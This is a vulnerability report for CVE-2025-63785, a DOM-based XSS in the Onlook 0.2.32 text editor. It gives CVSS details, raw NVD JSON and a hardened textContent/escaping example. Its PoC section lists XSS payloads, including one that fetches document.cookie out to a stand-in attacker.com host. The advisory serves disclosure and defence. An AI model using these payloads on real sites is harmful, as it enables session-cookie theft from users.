Security Vulnerability Report
CVE-2025-63785 CVSS 6.1 MEDIUM

Published: 2025-11-07 17:15:48
Last Modified: 2025-12-08 16:06:31

Description

A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the text editor feature of the Onlook web application 0.2.32. This vulnerability occurs because user-supplied input is not properly sanitized before being directly injected into the DOM via innerHTML when editing a text element. An attacker can exploit this to inject malicious HTML and script code, which is then executed within the context of the preview iframe, allowing for the execution of arbitrary scripts in the user's session.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:onlook:onlook:0.2.32:*:*:*:*:*:*:* - VULNERABLE
Onlook web application 0.2.32
Earlier versions may also be affected.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-63785 PoC - DOM XSS in Onlook Text Editor
// This PoC demonstrates the DOM-based XSS vulnerability in Onlook 0.2.32

// Malicious payload to be entered in the text editor
const maliciousPayload = `<img src=x onerror="alert(document.cookie)">`;

// Alternative payloads that could be used:
// 1. <script>alert(document.domain)</script>
// 2. <svg onload=alert('XSS')>
// 3. <iframe src="javascript:alert(document.cookie)">
// 4. <body onload=alert(document.cookie)>

// Attack scenario:
// 1. Attacker creates or edits a text element in Onlook
// 2. Attacker injects the malicious payload into the text content
// 3. When victim previews or views the content, the script executes

// Example of exploitation via text editor:
function exploitOnlookDOMXSS() {
  // Simulating text editor input injection
  // (inner quotes escaped so the onerror attribute stays well-formed)
  const userInput = '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">';

  // Vulnerable code pattern (what Onlook might be doing internally)
  // element.innerHTML = userInput; // No sanitization!

  console.log('Malicious payload injected:', userInput);
  return 'XSS payload ready for injection';
}

exploitOnlookDOMXSS();
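As an added example (not Onlook's code and not part of the original advisory), the innerHTML sink pattern the description names next to a hardened version that writes edited text through textContent, plus an escaping helper for the case where the editor has to build markup as a string. The element object is a constructed stand-in so the file runs under Node without a DOM.

```javascript
// Vulnerable pattern described by the advisory (CWE-79): the edited text is
// assigned to innerHTML, so any tag or event-handler attribute in it is
// parsed and executed by the browser.
function renderTextUnsafe(el, userText) {
  el.innerHTML = userText;
}

// Hardened: treat the edited text as text. textContent never parses markup,
// so "<img onerror=...>" is shown literally instead of being executed.
function renderTextSafe(el, userText) {
  el.textContent = userText;
}

// When markup genuinely has to be assembled as a string (e.g. wrapping the
// text in a <span>), encode the characters that can break out of text or
// attribute context before concatenating.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function wrapEscaped(userText) {
  return `<span class="editable">${escapeHtml(userText)}</span>`;
}

// Constructed sample input of the shape quoted in the PoC section above.
const SAMPLE_INPUT = '<img src=x onerror="alert(document.cookie)">';

// Constructed stand-in for a DOM element; a real element would parse the
// innerHTML assignment and fire the onerror handler.
function makeElement() {
  return { innerHTML: '', textContent: '' };
}

// Runs both sinks on the same input so the difference is visible: the unsafe
// path hands the raw markup to the parser, the safe path stores it as text.
// Defence in depth for the preview iframe the description mentions: a CSP
// without 'unsafe-inline' also blocks inline onerror handlers if a sink is missed.
function demo() {
  const unsafe = makeElement();
  const safe = makeElement();
  renderTextUnsafe(unsafe, SAMPLE_INPUT);
  renderTextSafe(safe, SAMPLE_INPUT);
  return { unsafeHtml: unsafe.innerHTML, safeText: safe.textContent, wrapped: wrapEscaped(SAMPLE_INPUT) };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```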

References

https://blog.soohyun.tech/CVE-2025-63785-DOM-XSS-in-Onlook-27e557175d2e80e1b210c75b77952115 (Exploit, Third Party Advisory)
https://tossbank.notion.site/DOM-XSS-in-onlook-27e557175d2e80e1b210c75b77952115 (Broken Link)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-63785",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-07T17:15:47.887",
    "lastModified": "2025-12-08T16:06:30.767",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the text editor feature of the Onlook web application 0.2.32. This vulnerability occurs because user-supplied input is not properly sanitized before being directly injected into the DOM via innerHTML when editing a text element. An attacker can exploit this to inject malicious HTML and script code, which is then executed within the context of the preview iframe, allowing for the execution of arbitrary scripts in the user's session."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-20"},
          {"lang": "en", "value": "CWE-79"},
          {"lang": "en", "value": "CWE-116"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:onlook:onlook:0.2.32:*:*:*:*:*:*:*",
                "matchCriteriaId": "6A720EDB-10C0-47F4-BCF5-138FB5124DFA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://blog.soohyun.tech/CVE-2025-63785-DOM-XSS-in-Onlook-27e557175d2e80e1b210c75b77952115",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://tossbank.notion.site/DOM-XSS-in-onlook-27e557175d2e80e1b210c75b77952115",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      }
    ]
  }
}